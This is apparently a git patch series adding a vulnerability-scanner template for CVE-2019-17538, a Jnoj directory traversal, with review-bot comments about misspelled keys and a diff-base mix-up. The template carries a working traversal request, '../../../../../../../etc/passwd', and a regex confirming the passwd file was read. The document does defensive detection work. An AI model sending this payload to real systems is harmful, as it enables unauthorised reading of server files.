From 780c343a95d0a85855217cccff2fcb1810c895ff Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:56:08 +0530 Subject: [PATCH 1/6] Add files via upload Jnoj Directory Traversal --- cves/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 0a768b9d954d47736e5d574b3888532151609857 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:58:56 +0530 Subject: [PATCH 2/6] Delete CVE-2019-17538.yaml --- cves/CVE-2019-17538.yaml | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 cves/CVE-2019-17538.yaml diff --git a/cves/CVE-2019-17538.yaml b/cves/CVE-2019-17538.yaml deleted file mode 100644 index d42aa4f3eb..0000000000 --- a/cves/CVE-2019-17538.yaml +++ /dev/null 
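Review bot: The raw request in the new template has no `Host: {{Hostname}}` line and hard-codes the `/jnoj/web/` prefix, so it depends on how the scanner fills in the host and only covers installs deployed under that exact path; either can leave an affected instance unreported. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET does nothing and can be dropped. Two keys are misspelled, `tegs` and `matchers-conditions` (the engine reads `tags` and `matchers-condition`). Depending on how strictly the file is parsed, it either fails to load, or it carries no tags and the matchers fall back to the default OR, so any 200 response would be flagged. The identical content is re-added under `cves/2019/` in patch 3/6, so the same points apply there.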
@@ -1,21 +0,0 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: High - reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - matchers-conditions: and - matchers: - - type : regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - From e281df8e1ffd972445bda94686bd585d51d26021 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 16:59:32 +0530 Subject: [PATCH 3/6] Add files via upload Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cves/2019/CVE-2019-17538.yaml diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml new file mode 100644 index 0000000000..d42aa4f3eb --- /dev/null +++ b/cves/2019/CVE-2019-17538.yaml @@ -0,0 +1,21 @@ +id: CVE-2019-17538 +info: + name: Jnoj Directory Traversal for file reading(LFI) + author: pussycat0x + severity: High + reference: https://github.com/shi-yang/jnoj/issues/53 + tegs: cve.cve2019,jnoj,cms +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + matchers-conditions: and + matchers: + - type : regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + From 3a9f49972b4d40ee8be80cbd37dd85db9f0a1098 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:25:56 +0530 Subject: [PATCH 4/6] Jnoj Directory Traversal --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..669e23d523 100644 
--- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,7 +4,7 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tags: cve.cve2019,jnoj,cms requests: - raw: - | From 1c7cd8921ea49d5aeedaa4a29c7404e4b9aff25c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:26:36 +0530 Subject: [PATCH 5/6] syntax update --- cves/2019/CVE-2019-17538.yaml | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index d42aa4f3eb..485a98cdef 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -4,18 +4,20 @@ info: author: pussycat0x severity: High reference: https://github.com/shi-yang/jnoj/issues/53 - tegs: cve.cve2019,jnoj,cms + tegs: cve.cve2019,jnoj,lfi + requests: - raw: - | GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 Content-Type: application/x-www-form-urlencoded - matchers-conditions: and + + matchers-condition: and matchers: - - type : regex - regex: - - "root:[x*]:0:0" - type: status status: - - 200 - + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From ff198c3ad920071e484439617ba7396ac162ae24 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 1 Mar 2021 17:30:49 +0530 Subject: [PATCH 6/6] Update CVE-2019-17538.yaml --- cves/2019/CVE-2019-17538.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index 485a98cdef..8fd852fb23 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml 
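Review bot: The `tags` fix from patch 4/6 is lost in the patch 5/6 hunk, which is diffed against blob d42aa4f3eb rather than 669e23d523, so both its removed and added lines spell the key `tegs`. The context of patch 6/6 still shows `tegs: cve.cve2019,jnoj,lfi`, so the final template would not be selectable by tag. The line should presumably read `tags: cve,cve2019,jnoj,lfi`, with a comma in place of the dot so that `cve` and `cve2019` are separate tags. A short `description` under `info:`, naming the affected endpoint and the upstream issue, would also help anyone triaging a hit.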
@@ -2,7 +2,7 @@ id: CVE-2019-17538 info: name: Jnoj Directory Traversal for file reading(LFI) author: pussycat0x - severity: High + severity: high reference: https://github.com/shi-yang/jnoj/issues/53 tegs: cve.cve2019,jnoj,lfi